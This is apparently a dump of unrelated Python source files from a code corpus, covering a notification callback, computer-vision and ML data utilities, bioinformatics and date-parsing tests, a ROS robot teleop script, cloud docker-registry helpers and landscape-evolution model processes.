statsd_client.timing_with_dates(
"callback.{}.elapsed-time".format(client_name.lower()),
datetime.utcnow(),
notification.sent_at,
)
if notification.billable_units == 0:
service = notification.service
template_model = dao_get_template_by_id(notification.template_id, notification.template_version)
template = SMSMessageTemplate(
template_model.__dict__,
values=notification.personalisation,
prefix=service.name,
show_prefix=service.prefix_sms,
)
notification.billable_units = template.fragment_count
notifications_dao.dao_update_notification(notification)
if notification_status != NOTIFICATION_PENDING:
service_callback_api = get_service_delivery_status_callback_api_for_service(service_id=notification.service_id)
# queue callback task only if the service_callback_api exists
if service_callback_api:
encrypted_notification = create_delivery_status_callback_data(notification, service_callback_api)
send_delivery_status_to_service.apply_async(
[str(notification.id), encrypted_notification],
queue=QueueNames.CALLBACKS,
)
success = "{} callback succeeded. reference {} updated".format(client_name, provider_reference)
return success
def set_notification_sent_by(notification, client_name):
notification.sent_by = client_name
dao_update_notification(notification)
|
105108
|
import torch, torchvision
class CIFAR10(torchvision.datasets.CIFAR10):
def __init__(self, root, part, labeled_factors, transform):
super().__init__(root, part == 'train', transform = transform, download = True)
if len(labeled_factors) == 0:
self.has_label = False
self.nclass = []
self.class_freq = []
else:
self.has_label = True
self.nclass = [10]
class_count = torch.tensor(self.targets).bincount(minlength = 10)
self.class_freq = [class_count.float() / self.data.shape[0]]
def __getitem__(self, k):
img, target = super().__getitem__(k)
return (img, torch.tensor([target])) if self.has_label else img
|
105114
|
import numpy as np
from scipy.interpolate import RectBivariateSpline
def TemplateCorrection(T, It1, rect, p0=None):
    # avoid a mutable default argument; p0 is modified in place below
    if p0 is None:
        p0 = np.zeros(2)
    threshold = 0.1
x1_t, y1_t, x2_t, y2_t = rect[0], rect[1], rect[2], rect[3]
Iy, Ix = np.gradient(It1)
rows_img, cols_img = It1.shape
rows_rect, cols_rect = T.shape
dp = [[cols_img], [rows_img]]
# what can be precomputed
y = np.arange(0, rows_img, 1)
x = np.arange(0, cols_img, 1)
spline1 = RectBivariateSpline(y, x, It1)
spline_gx = RectBivariateSpline(y, x, Ix)
spline_gy = RectBivariateSpline(y, x, Iy)
jac = np.array([[1,0],[0,1]])
while np.square(dp).sum() > threshold:
x1_w, y1_w = x1_t + p0[0], y1_t + p0[1]
x2_w, y2_w = x2_t + p0[0], y2_t + p0[1]
cw = np.linspace(x1_w, x2_w, cols_rect)
rw = np.linspace(y1_w, y2_w, rows_rect)
ccw, rrw = np.meshgrid(cw, rw)
warpImg = spline1.ev(rrw, ccw)
#compute error image
err = T - warpImg
errImg = err.reshape(-1,1)
#compute gradient
Ix_w = spline_gx.ev(rrw, ccw)
Iy_w = spline_gy.ev(rrw, ccw)
#I is (n,2)
I = np.vstack((Ix_w.ravel(),Iy_w.ravel())).T
#computer Hessian
delta = I @ jac
#H is (2,2)
H = delta.T @ delta
#compute dp
#dp is (2,2)@(2,n)@(n,1) = (2,1)
dp = np.linalg.inv(H) @ (delta.T) @ errImg
#update parameters
p0[0] += dp[0,0]
p0[1] += dp[1,0]
rect[0] += p0[0]
rect[1] += p0[1]
rect[2] += p0[0]
rect[3] += p0[1]
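# Hedged usage sketch (not part of the original module): runs the correction on
# a synthetic image where the template is cut straight out of the image, so the
# recovered shift should stay near zero. Array sizes are arbitrary examples;
# note that `rect` is updated in place and nothing is returned.
if __name__ == "__main__":
    It1 = np.random.rand(120, 160)
    rect = [40.0, 30.0, 80.0, 70.0]  # x1, y1, x2, y2
    T = It1[int(rect[1]):int(rect[3]) + 1, int(rect[0]):int(rect[2]) + 1]
    TemplateCorrection(T, It1, rect)
    print("corrected rect:", rect)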
|
105137
|
import logging
import tempfile
import unittest
from os import path
from Bio import SeqIO
from staramr.blast.JobHandler import JobHandler
from staramr.blast.plasmidfinder.PlasmidfinderBlastDatabase import PlasmidfinderBlastDatabase
from staramr.blast.resfinder.ResfinderBlastDatabase import ResfinderBlastDatabase
from staramr.databases.AMRDatabasesManager import AMRDatabasesManager
from staramr.databases.resistance.resfinder.ARGDrugTableResfinder import ARGDrugTableResfinder
from staramr.databases.resistance.pointfinder.ARGDrugTablePointfinder import ARGDrugTablePointfinder
from staramr.detection.AMRDetectionResistance import AMRDetectionResistance
logger = logging.getLogger('AMRDetectionMLST')
class AMRDetectionMLST(unittest.TestCase):
def setUp(self):
blast_databases_repositories = AMRDatabasesManager.create_default_manager().get_database_repos()
self.resfinder_dir = blast_databases_repositories.get_repo_dir(
'resfinder')
self.pointfinder_dir = blast_databases_repositories.get_repo_dir(
'pointfinder')
self.plasmidfinder_dir = blast_databases_repositories.get_repo_dir(
'plasmidfinder')
self.resfinder_database = ResfinderBlastDatabase(self.resfinder_dir)
self.resfinder_drug_table = ARGDrugTableResfinder()
self.pointfinder_drug_table = ARGDrugTablePointfinder()
self.plasmidfinder_database = PlasmidfinderBlastDatabase(
self.plasmidfinder_dir)
self.pointfinder_database = None
self.blast_out = tempfile.TemporaryDirectory()
self.blast_handler = JobHandler(
{'resfinder': self.resfinder_database, 'pointfinder': self.pointfinder_database,
'plasmidfinder': self.plasmidfinder_database}, 2, self.blast_out.name)
self.outdir = tempfile.TemporaryDirectory()
self.amr_detection = AMRDetectionResistance(self.resfinder_database, self.resfinder_drug_table,
self.blast_handler, self.pointfinder_drug_table,
self.pointfinder_database, output_dir=self.outdir.name)
self.test_data_dir = path.join(path.dirname(__file__), '..', 'data')
def tearDown(self):
self.blast_out.cleanup()
self.outdir.cleanup()
def testMLSTResults(self):
file = path.join(self.test_data_dir, "test-mlst-summary.fsa")
files = [file]
self.amr_detection.run_amr_detection(files, 99, 90, 90, 90,0,0,0,0,0)
mlst_results = self.amr_detection.get_mlst_results()
self.assertEqual(len(mlst_results.index), 1, 'Wrong number of results detected')
self.assertEqual(len(mlst_results.columns), 9, 'Wrong number of columns detected')
self.assertEqual(mlst_results['Scheme'].iloc[0], 'senterica', msg='Wrong Scheme')
self.assertEqual(mlst_results['Sequence Type'].iloc[0], '1', msg='Wrong Sequence Type')
self.assertEqual(mlst_results['Locus 1'].iloc[0], 'aroC(1)', msg='Wrong Locus 1 Result')
self.assertEqual(mlst_results['Locus 2'].iloc[0], 'dnaN(1)', msg='Wrong Locus 2 Result')
self.assertEqual(mlst_results['Locus 3'].iloc[0], 'hemD(1)', msg='Wrong Locus 3 Result')
self.assertEqual(mlst_results['Locus 4'].iloc[0], 'hisD(1)', msg='Wrong Locus 4 Result')
self.assertEqual(mlst_results['Locus 5'].iloc[0], 'purE(1)', msg='Wrong Locus 5 Result')
self.assertEqual(mlst_results['Locus 6'].iloc[0], 'sucA(1)', msg='Wrong Locus 6 Result')
self.assertEqual(mlst_results['Locus 7'].iloc[0], 'thrA(5)', msg='Wrong Locus 7 Result')
def testNoMLSTResults(self):
file = path.join(self.test_data_dir, "gyrA-S97N.fsa")
files = [file]
self.amr_detection.run_amr_detection(files, 99, 90, 90, 90,0,0,0,0,0)
mlst_results = self.amr_detection.get_mlst_results()
self.assertEqual(len(mlst_results.index), 1, 'Wrong number of results detected')
self.assertEqual(len(mlst_results.columns), 2, 'Wrong number of columns detected')
self.assertEqual(mlst_results['Scheme'].iloc[0], '-', msg='Scheme is found, expected none')
self.assertEqual(mlst_results['Sequence Type'].iloc[0], '-', msg='Sequence Type is found, expected none')
|
105150
|
import unittest
import subprocess
import psutil
import sys
import os
import numpy as np
import time
import socket
# Using pygame for gamepad interface
import pygame
# ROS
import rospy
import actionlib
import sensor_msgs.msg
import geometry_msgs.msg
import trajectory_msgs.msg
import rosgraph
import std_srvs.srv
import tf2_ros
import tf
# spartan
from spartan.utils.ros_utils import SimpleSubscriber, JointStateSubscriber
from spartan.utils.ros_utils import RobotService
import spartan.utils.ros_utils as ros_utils
import spartan.utils.utils as spartan_utils
import spartan.utils.transformations as transformations
import robot_control.control_utils as control_utils
from spartan.utils.schunk_driver import SchunkDriver
# spartan ROS
import robot_msgs.msg
def make_cartesian_trajectory_goal_world_frame(pos, quat, duration):
# (array([0.588497 , 0.00716426, 0.5159925 ]), array([ 0.70852019, -0.15500524, 0.67372875, 0.1416407 ]))
goal = robot_msgs.msg.CartesianTrajectoryGoal()
traj = goal.trajectory
# frame_id = "iiwa_link_ee"
frame_id = "base"
ee_frame_id = "iiwa_link_ee"
xyz_knot = geometry_msgs.msg.PointStamped()
xyz_knot.header.frame_id = frame_id
xyz_knot.point.x = 0
xyz_knot.point.y = 0
xyz_knot.point.z = 0
traj.xyz_points.append(xyz_knot)
xyz_knot = geometry_msgs.msg.PointStamped()
xyz_knot.header.frame_id = frame_id
xyz_knot.point.x = pos[0]
xyz_knot.point.y = pos[1]
xyz_knot.point.z = pos[2]
traj.xyz_points.append(xyz_knot)
traj.ee_frame_id = ee_frame_id
traj.time_from_start.append(rospy.Duration(0.0))
traj.time_from_start.append(rospy.Duration(duration))
quat_msg = geometry_msgs.msg.Quaternion()
quat_msg.w = quat[0]
quat_msg.x = quat[1]
quat_msg.y = quat[2]
quat_msg.z = quat[3]
traj.quaternions.append(quat_msg)
traj.quaternions.append(quat_msg)
return goal
def make_cartesian_gains_msg(kp_rot, kp_trans):
msg = robot_msgs.msg.CartesianGain()
msg.rotation.x = kp_rot
msg.rotation.y = kp_rot
msg.rotation.z = kp_rot
msg.translation.x = kp_trans
msg.translation.y = kp_trans
msg.translation.z = kp_trans
return msg
def make_force_guard_msg(scale):
msg = robot_msgs.msg.ForceGuard()
external_force = robot_msgs.msg.ExternalForceGuard()
body_frame = "iiwa_link_ee"
expressed_in_frame = "iiwa_link_ee"
force_vec = scale*np.array([-1,0,0])
external_force.force.header.frame_id = expressed_in_frame
external_force.body_frame = body_frame
external_force.force.vector.x = force_vec[0]
external_force.force.vector.y = force_vec[1]
external_force.force.vector.z = force_vec[2]
msg.external_force_guards.append(external_force)
return msg
def make_move_goal(trans, quat, duration):
goal = make_cartesian_trajectory_goal_world_frame(
pos = trans,
quat = quat,
duration = duration)
goal.gains.append(make_cartesian_gains_msg(20, 20.))
goal.force_guard.append(make_force_guard_msg(15.))
return goal
def ro(quat):
return [quat[1], quat[2], quat[3], quat[0]]
def tf_matrix_from_pose(pose):
trans, quat = pose
mat = transformations.quaternion_matrix(quat)
mat[:3, 3] = trans
return mat
def get_relative_tf_between_poses(pose_1, pose_2):
tf_1 = tf_matrix_from_pose(pose_1)
tf_2 = tf_matrix_from_pose(pose_2)
return np.linalg.inv(tf_1).dot(tf_2)
def build_rbt_from_ros_environment():
robot = RigidBodyTree()
package_map = PackageMap()
package_map.PopulateFromEnvironment("ROS_PACKAGE_PATH")
base_dir = getDrakePath()
weld_frame = None
floating_base_type = FloatingBaseType.kFixed
robot = RigidBodyTree()
AddModelInstanceFromUrdfStringSearchingInRosPackages(
rospy.get_param("/robot_description"),
package_map,
base_dir,
floating_base_type,
weld_frame,
robot)
return robot
def do_main():
rospy.init_node('gamepad_teleop', anonymous=True)
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
    robotSubscriber = ros_utils.JointStateSubscriber("/joint_states")
rospy.loginfo("Waiting for full kuka state...")
while len(robotSubscriber.joint_positions.keys()) < 3:
rospy.sleep(0.1)
rospy.loginfo("got full state")
rospy.loginfo("Grabbing controller...")
pygame.init()
pygame.joystick.init()
joysticks = [pygame.joystick.Joystick(x) for x in range(pygame.joystick.get_count())]
rospy.loginfo("Found %d controllers" % len(joysticks))
if len(joysticks) == 0:
rospy.logerr("Didn't find a controller :(.")
sys.exit(-1)
joystick = joysticks[0]
joystick.init()
rospy.loginfo("Using joystick %s" % joystick.get_name())
handDriver = SchunkDriver()
gripper_goal_pos = 0.1
# Start by moving to an above-table pregrasp pose that we know
# EE control will work well from (i.e. far from singularity)
above_table_pre_grasp = [0.04486168762069299, 0.3256606458812486, -0.033502080520812445, -1.5769091802934694, 0.05899249087322813, 1.246379583616529, 0.38912999977004026]
robotService = ros_utils.RobotService.makeKukaRobotService()
success = robotService.moveToJointPosition(above_table_pre_grasp, timeout=5)
print("Moved to position")
# Then kick off task space streaming
sp = rospy.ServiceProxy('plan_runner/init_task_space_streaming',
robot_msgs.srv.StartStreamingPlan)
init = robot_msgs.srv.StartStreamingPlanRequest()
init.force_guard.append(make_force_guard_msg(20.))
    print(sp(init))
print("Started task space streaming")
pub = rospy.Publisher('plan_runner/task_space_streaming_setpoint',
robot_msgs.msg.CartesianGoalPoint, queue_size=1)
tf_ee = None
def cleanup():
rospy.wait_for_service("plan_runner/stop_plan")
sp = rospy.ServiceProxy('plan_runner/stop_plan',
std_srvs.srv.Trigger)
init = std_srvs.srv.TriggerRequest()
        print(sp(init))
print("Done cleaning up and stopping streaming plan")
frame_name = "iiwa_link_ee"
# origin_tf, in the above EE frame
origin_tf = transformations.euler_matrix(0.0, 0., 0.)
origin_tf[0:3, 3] = np.array([0.15, 0.0, 0.0])
origin_tf_inv = np.linalg.inv(origin_tf)
rospy.on_shutdown(cleanup)
br = tf.TransformBroadcaster()
try:
last_gripper_update_time = time.time()
last_update_time = time.time()
while not rospy.is_shutdown():
#for axis_i in range(joystick.get_numaxes()):
# rospy.loginfo("Axis %d: %f" % (axis_i, joystick.get_axis(axis_i)))
#for button_i in range(joystick.get_numbuttons()):
# rospy.loginfo("Button %d: %f" % (button_i, joystick.get_button(button_i)))
#time.sleep(0.5)
# Gamepad: Logitech 310
# DPad: Axis 1 +1 is down
# Axis 0 +1 is right
# Left stick: Axis 7 +1 is down
# Axis 6 +1 is right
# Right stick: Axis 3 +1 is right
# Axis 4 +1 is down
# Left bumper: Button 4
# Right bumper: Button 5
gripper_dt = time.time() - last_gripper_update_time
dt = time.time() - last_update_time
pygame.event.pump()
if gripper_dt > 0.2:
last_gripper_update_time = time.time()
gripper_goal_pos += (joystick.get_button(5) - joystick.get_button(4))*dt*0.05
gripper_goal_pos = max(min(gripper_goal_pos, 0.1), 0.0)
handDriver.sendGripperCommand(gripper_goal_pos, speed=0.1, timeout=0.01)
print "Gripper goal pos: ", gripper_goal_pos
br.sendTransform(origin_tf[0:3, 3],
ro(transformations.quaternion_from_matrix(origin_tf)),
rospy.Time.now(),
"origin_tf",
frame_name)
try:
current_pose_ee = ros_utils.poseFromROSTransformMsg(
tfBuffer.lookup_transform("base", frame_name, rospy.Time()).transform)
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print("Troubling looking up tf...")
rate.sleep()
continue
if dt > 0.01:
last_update_time = time.time()
if tf_ee is None:
tf_ee = tf_matrix_from_pose(current_pose_ee)
tf_ee[0, 3] += -1.*joystick.get_axis(7)*dt*0.25
tf_ee[1, 3] += -1.*joystick.get_axis(6)*dt*0.25
tf_ee[2, 3] += -1.*joystick.get_axis(4)*dt*0.25
dr = -1.*joystick.get_axis(0)*dt
dp = 1.*joystick.get_axis(1)*dt
dy = -1.*joystick.get_axis(3)*dt
tf_ee = tf_ee.dot(transformations.euler_matrix(dr, 0., 0.))
tf_ee = tf_ee.dot(transformations.euler_matrix(0, dp, 0.))
tf_ee = tf_ee.dot(transformations.euler_matrix(0., 0., dy))
target_trans_ee = tf_ee[:3, 3]
target_quat_ee = transformations.quaternion_from_matrix(tf_ee)
new_msg = robot_msgs.msg.CartesianGoalPoint()
new_msg.xyz_point.header.frame_id = "world"
new_msg.xyz_point.point.x = target_trans_ee[0]
new_msg.xyz_point.point.y = target_trans_ee[1]
new_msg.xyz_point.point.z = target_trans_ee[2]
new_msg.xyz_d_point.x = 0.
new_msg.xyz_d_point.y = 0.
new_msg.xyz_d_point.z = 0.0
new_msg.quaternion.w = target_quat_ee[0]
new_msg.quaternion.x = target_quat_ee[1]
new_msg.quaternion.y = target_quat_ee[2]
new_msg.quaternion.z = target_quat_ee[3]
new_msg.gain = make_cartesian_gains_msg(5., 10.)
new_msg.ee_frame_id = frame_name
pub.publish(new_msg)
except Exception as e:
print "Suffered exception ", e
if __name__ == "__main__":
do_main()
|
105164
|
import boto3
from kaos_backend.constants import DOCKER_REGISTRY, REGION, CLOUD_PROVIDER
def get_login_command():
if CLOUD_PROVIDER == 'AWS':
# ecr = boto3.client('ecr', region_name=REGION)
#
# raw_auth_data = ecr.get_authorization_token()['authorizationData'][0]['authorizationToken']
# _, docker_auth_token = b64decode(raw_auth_data).decode('UTF-8').split(":")
return f"$(aws ecr get-login --region {REGION} --no-include-email)"
elif CLOUD_PROVIDER == "GCP":
return f"gcloud auth print-access-token | docker login -u oauth2accesstoken --password-stdin https://{DOCKER_REGISTRY}"
else:
return ""
def create_docker_repo(repo_name):
if CLOUD_PROVIDER == 'AWS':
ecr = boto3.client('ecr', region_name=REGION)
ecr.create_repository(repositoryName=repo_name)
def delete_docker_repo(repo_name):
if CLOUD_PROVIDER == 'AWS':
ecr = boto3.client('ecr', region_name=REGION)
ecr.delete_repository(repositoryName=repo_name, force=True)
|
105207
|
from .unet import *
from .vae import *
from .others import *
from .pconv_unet import *
from .discriminator import *
from .resnet_cls import *
|
105233
|
from pyspark.sql import SparkSession
from pyspark.sql.functions import udf
from pyspark.sql.types import *
from pyspark.rdd import RDD
from pyspark.mllib.linalg import SparseVector, VectorUDT, Vectors
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
import re
import numpy as np
#data preprocessing class
class preprocessor(object):
'''
preprocessor for Reuters news articles corpus
parameters:
- bigrams: bool
if set to True, will use bigrams and unigrams in term frequency or tf-idf (default)
if set to False, will only use unigrams in term frequency or tf-idf
- min_df: int
minimum number of times a word or bigram must appear in document to be included as a feature (default 2)
- stemming: bool
if set to True, words are stemmed when tokenized (default)
if set to False, words are not stemmed when tokenized
- tfidf: bool
if set to True, tf-idf vectorization is used (default)
if set to False, term frequency vectorization is used
methods:
- transform(X,y)
convert text and labels into tf-idf dataframe for classifier
parameters:
- X: pyspark rdd
rdd with text as rows
- y: pyspark rdd (optional)
rdd with labels as rows
    requires the following non-standard Python packages:
- nltk.corpus.stopwords
- nltk.stem.snowball.SnowballStemmer
- numpy
'''
def __init__(self,bigrams=True,min_df=3,stemming=True,tfidf=True):
self.regex = re.compile('[^a-zA-Z ]')
self.stop = set(stopwords.words('english'))
self.stemmer = SnowballStemmer("english")
self.bigrams = bigrams
self.min_df = min_df
self.stemming = stemming
self.tfidf = tfidf
def _tokenize(self, row):
'''
clean texts by removing special and non-chars
stems each word and removes stop words
return list of tokenized words for each row
'''
chars = re.sub(r'-|"|&',' ',row) #replace dashes, quotes, and ampersands
chars = self.regex.sub('',chars) # remove nonchars
wordlist = str(chars).split()
if self.stemming:
wordlist = [self.stemmer.stem(word.lower()) for word in wordlist if word.lower() not in self.stop] # stem and remove stopwords
else:
wordlist = [word.lower() for word in wordlist if word.lower() not in self.stop]
#create bigrams if enabled
if self.bigrams:
bigrams = []
for i in range(len(wordlist)-1):
bigrams.append(wordlist[i]+" "+wordlist[i+1])
wordlist = wordlist + bigrams
return wordlist
def _term_frequency(self,row):
'''
        convert a row of word tokens into a sparse vector of term frequencies
'''
sparse_dic = {}
for word in row:
if word in self.dictionary:
if self.dictionary[word] in sparse_dic:
sparse_dic[self.dictionary[word]] += 1.
else:
sparse_dic[self.dictionary[word]] = 1.
tf = SparseVector(len(self.dictionary),sparse_dic)
return tf
def _tf_idf(self,row):
'''
convert row of word token counts into sparse vector of tfidf frequencies
'''
sparse_dic = {}
df_dic = {}
for word in row:
if word in self.dictionary:
if self.dictionary[word] in sparse_dic:
sparse_dic[self.dictionary[word]] += 1.
else:
sparse_dic[self.dictionary[word]] = 1.
if word in self.doc_freq:
df_dic[self.dictionary[word]] = self.doc_freq[word]
else:
df_dic[self.dictionary[word]] = 1
for key in sparse_dic:
sparse_dic[key] = (1+np.log(sparse_dic[key]))*(np.log10(float(self.doc_count)/df_dic[key]))
tfidf = SparseVector(len(self.dictionary),sparse_dic)
return tfidf
def transform(self,X,y=None,train=True):
'''
convert input RDDs into dataframe of features and labels
'''
#check input type
if type(X) != RDD:
raise TypeError("Arguments must be pySpark RDDs")
if y and type(y) != RDD:
raise TypeError("Arguments must be pySpark RDDs")
#word tokenization
X = X.map(self._tokenize).cache()
#create dictionary of words
if train:
self.dictionary = X.flatMap(lambda word: word).map(lambda word: (word,1)).reduceByKey(lambda acc, w: acc + w).filter(lambda x: x[1]>=self.min_df).collectAsMap()
            self.dictionary = dict(zip(self.dictionary, range(len(self.dictionary))))
#populate word count dictionary
if self.tfidf:
self.doc_freq = X.map(lambda wordlist: set(wordlist)).flatMap(lambda word: word).map(lambda word: (word,1)).reduceByKey(lambda acc, w: acc + w).filter(lambda x: x[1]>=2).collectAsMap()
self.doc_count = X.count()
#create word vectors
if self.tfidf:
X = X.map(self._tf_idf)
else:
X = X.map(self._term_frequency)
#check if labels exist
if y:
#combine X and y into single dataframe
X = X.zipWithIndex().map(lambda r: (r[1],r[0]))
y = y.zipWithIndex().map(lambda r: (r[1],r[0]))
data = X.join(y).map(lambda r: r[1])
df = data.toDF(['features','label'])
#one hot encoding for labels
CCAT = udf(lambda l: 1 if "CCAT" in l else 0, IntegerType())
ECAT = udf(lambda l: 1 if "ECAT" in l else 0, IntegerType())
GCAT = udf(lambda l: 1 if "GCAT" in l else 0, IntegerType())
MCAT = udf(lambda l: 1 if "MCAT" in l else 0, IntegerType())
df = df.withColumn("CCAT",CCAT(df['label']))
df = df.withColumn("ECAT",ECAT(df['label']))
df = df.withColumn("GCAT",GCAT(df['label']))
df = df.withColumn("MCAT",MCAT(df['label']))
df = df.select('features','CCAT','ECAT','GCAT','MCAT')
else:
X = X.map(lambda row: [row])
schema = StructType([StructField("features", VectorUDT(), True)])
df = X.toDF(schema)
return df
if __name__ == '__main__':
#initialize spark session
spark = SparkSession\
.builder\
.appName("Test")\
.config('spark.sql.warehouse.dir', 'file:///C:/')\
.getOrCreate()
sc = spark.sparkContext
#load data
X_file = "./data/X_train_vsmall.txt"
y_file = "./data/y_train_vsmall.txt"
data = sc.textFile(X_file)
labels = sc.textFile(y_file)
#process data
p1 = preprocessor(bigrams=True,stemming=True,tfidf=True)
df = p1.transform(data,labels)
    df.show()
    df.printSchema()
    print(df.select('features').rdd.first())
#save to parquet
try:
df.write.save("./data/df_train_vsmall.parquet")
except:
pass
#test without labels
X_test = "./data/X_test_vsmall.txt"
data = sc.textFile(X_file)
p2 = preprocessor(bigrams=False,stemming=True,tfidf=True)
df_no_y = p2.transform(data)
    df_no_y.show()
    df_no_y.printSchema()
    print(df_no_y.select('features').rdd.first())
try:
df_no_y.write.save("./data/df_test_vsmall.parquet")
except:
pass
spark.stop()
|
105280
|
s = input()
s = s.upper()
c = 0
for i in ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
for j in s:
if(i!=j):
c = 0
else:
c = 1
break
if(c==0):
break
if c==1:
print("Pangram exists")
else:
print("Pangram doesn't exists")
|
105299
|
from .audio_provider import AudioProvider
from .visual_provider import VisualProvider
from .multifile_audiovisual_provider import MultiFile_AVProvider
from .singlefile_audiovisual_provider import SingleFile_AVProvider
|
105318
|
from django_mptt_acl.rules import DefaultRoleRule
class ManageRole(object):
name = 'manage'
permissions = ('read', 'update', 'delete', 'invite', 'create')
required_permissions_ancestors = ('read',)
required_permissions_descendants = permissions
rules = (DefaultRoleRule,)
|
105357
|
from datetime import date, datetime
from pytz import utc
from parameterized import parameterized, param
import dateparser
from tests import BaseTestCase
class TestParseFunction(BaseTestCase):
def setUp(self):
super().setUp()
self.result = NotImplemented
@parameterized.expand([
param(date_string="24 de Janeiro de 2014", expected_date=date(2014, 1, 24)),
param(date_string="2 de Enero de 2013", expected_date=date(2013, 1, 2)),
param(date_string="January 25, 2014", expected_date=date(2014, 1, 25)),
])
def test_parse_dates_in_different_languages(self, date_string, expected_date):
self.when_date_is_parsed_with_defaults(date_string)
self.then_parsed_date_is(expected_date)
@parameterized.expand([
param(date_string="May 5, 2000 13:00",
expected_date=datetime(2000, 5, 5, 13, 0)),
param(date_string="August 8, 2018 5 PM",
expected_date=datetime(2018, 8, 8, 17, 0)),
param(date_string="February 26, 1981 5 am UTC",
expected_date=datetime(1981, 2, 26, 5, 0, tzinfo=utc)),
])
def test_parse_dates_with_specific_time(self, date_string, expected_date):
self.when_date_is_parsed_with_defaults(date_string)
self.then_parsed_date_and_time_is(expected_date)
@parameterized.expand([
param(date_string="May 5, 2000 13:00",
expected_date=datetime(2000, 5, 5, 13, 0),
relative=datetime(2000, 1, 1, 0, 0, tzinfo=utc)),
param(date_string="August 8, 2018 5 PM",
expected_date=datetime(2018, 8, 8, 17, 0),
relative=datetime(1900, 5, 5, 0, 0, tzinfo=utc)),
param(date_string="February 26, 1981 5 am UTC",
expected_date=datetime(1981, 2, 26, 5, 0, tzinfo=utc),
relative=datetime(1981, 2, 26, 5, 0, tzinfo=utc)),
])
def test_parse_dates_with_specific_time_and_settings(self, date_string, expected_date, relative):
self.when_date_is_parsed_with_settings(date_string, settings={'RELATIVE_BASE': relative})
self.then_parsed_date_and_time_is(expected_date)
@parameterized.expand([
param(date_string="24 de Janeiro de 2014", languages=['pt'], expected_date=date(2014, 1, 24)),
])
def test_dates_which_match_languages_are_parsed(self, date_string, languages, expected_date):
self.when_date_is_parsed(date_string, languages=languages)
self.then_parsed_date_is(expected_date)
@parameterized.expand([
param(date_string="January 24, 2014", languages=['pt']),
])
def test_dates_which_do_not_match_languages_are_not_parsed(self, date_string, languages):
self.when_date_is_parsed(date_string, languages=languages)
self.then_date_was_not_parsed()
@parameterized.expand([
param(date_string="24 de Janeiro de 2014", locales=['pt-TL'], expected_date=date(2014, 1, 24)),
])
def test_dates_which_match_locales_are_parsed(self, date_string, locales, expected_date):
self.when_date_is_parsed(date_string, locales=locales)
self.then_parsed_date_is(expected_date)
@parameterized.expand([
param(date_string="January 24, 2014", locales=['pt-AO']),
])
def test_dates_which_do_not_match_locales_are_not_parsed(self, date_string, locales):
self.when_date_is_parsed(date_string, locales=locales)
self.then_date_was_not_parsed()
def when_date_is_parsed_with_defaults(self, date_string):
self.result = dateparser.parse(date_string)
def when_date_is_parsed(self, date_string, languages=None, locales=None):
self.result = dateparser.parse(date_string, languages=languages, locales=locales)
def when_date_is_parsed_with_settings(self, date_string, settings=None):
self.result = dateparser.parse(date_string, settings=settings)
def then_parsed_date_is(self, expected_date):
self.assertEqual(self.result, datetime.combine(expected_date, datetime.min.time()))
def then_parsed_date_and_time_is(self, expected_date):
self.assertEqual(self.result, expected_date)
def then_date_was_not_parsed(self):
self.assertIsNone(self.result)
|
105358
|
import fastscapelib_fortran as fs
import numpy as np
import xsimlab as xs
from .grid import UniformRectilinearGrid2D
@xs.process
class TotalVerticalMotion:
"""Sum up all vertical motions of bedrock and topographic surface,
respectively.
Vertical motions may result from external forcing, erosion and/or
feedback of erosion on tectonics (isostasy).
"""
bedrock_upward_vars = xs.group('bedrock_upward')
surface_upward_vars = xs.group('surface_upward')
surface_downward_vars = xs.group('surface_downward')
bedrock_upward = xs.variable(
dims=('y', 'x'),
intent='out',
description='bedrock motion in upward direction'
)
surface_upward = xs.variable(
dims=('y', 'x'),
intent='out',
description='topographic surface motion in upward direction'
)
def run_step(self):
self.bedrock_upward = sum(self.bedrock_upward_vars)
self.surface_upward = (sum(self.surface_upward_vars) -
sum(self.surface_downward_vars))
@xs.process
class SurfaceTopography:
"""Update the elevation of the (land and/or submarine) surface
topography.
"""
elevation = xs.variable(
dims=('y', 'x'),
intent='inout',
description='surface topography elevation'
)
motion_upward = xs.foreign(TotalVerticalMotion, 'surface_upward')
def finalize_step(self):
self.elevation += self.motion_upward
@xs.process
class SurfaceToErode:
"""Defines the topographic surface used for the computation of erosion
processes.
In this process class, it simply corresponds to the topographic
surface, unchanged, at the current time step.
Sometimes it would make sense to compute erosion processes after
having applied other processes such as tectonic forcing. This
could be achieved by subclassing.
"""
topo_elevation = xs.foreign(SurfaceTopography, 'elevation')
elevation = xs.variable(
dims=('y', 'x'),
intent='out',
description='surface elevation before erosion'
)
def run_step(self):
self.elevation = self.topo_elevation
@xs.process
class Bedrock:
"""Update the elevation of bedrock (i.e., land and/or submarine
basement).
"""
elevation = xs.variable(
dims=('y', 'x'),
intent='inout',
description='bedrock elevation'
)
depth = xs.on_demand(
dims=('y', 'x'),
description='bedrock depth below topographic surface'
)
bedrock_motion_up = xs.foreign(TotalVerticalMotion, 'bedrock_upward')
surface_motion_up = xs.foreign(TotalVerticalMotion, 'surface_upward')
surface_elevation = xs.foreign(SurfaceTopography, 'elevation')
@depth.compute
def _depth(self):
return self.surface_elevation - self.elevation
def initialize(self):
if np.any(self.elevation > self.surface_elevation):
raise ValueError("Encountered bedrock elevation higher than "
"topographic surface elevation.")
def run_step(self):
self._elevation_next = np.minimum(
self.elevation + self.bedrock_motion_up,
self.surface_elevation + self.surface_motion_up
)
def finalize_step(self):
self.elevation = self._elevation_next
@xs.process
class UniformSedimentLayer:
"""Uniform sediment (or regolith, or soil) layer.
This layer has uniform properties (undefined in this class) and
    generally undergoes active erosion, transport and deposition
processes.
"""
surf_elevation = xs.foreign(SurfaceTopography, 'elevation')
bedrock_elevation = xs.foreign(Bedrock, 'elevation')
thickness = xs.variable(
dims=('y', 'x'),
intent='out',
description='sediment layer thickness'
)
@thickness.compute
def _get_thickness(self):
return self.surf_elevation - self.bedrock_elevation
def initialize(self):
self.thickness = self._get_thickness()
def run_step(self):
self.thickness = self._get_thickness()
@xs.process
class TerrainDerivatives:
"""Compute, on demand, terrain derivatives such as slope or
curvature.
"""
shape = xs.foreign(UniformRectilinearGrid2D, 'shape')
spacing = xs.foreign(UniformRectilinearGrid2D, 'spacing')
elevation = xs.foreign(SurfaceTopography, 'elevation')
slope = xs.on_demand(
dims=('y', 'x'),
description='terrain local slope'
)
curvature = xs.on_demand(
dims=('y', 'x'),
description='terrain local curvature'
)
@slope.compute
def _slope(self):
slope = np.empty_like(self.elevation)
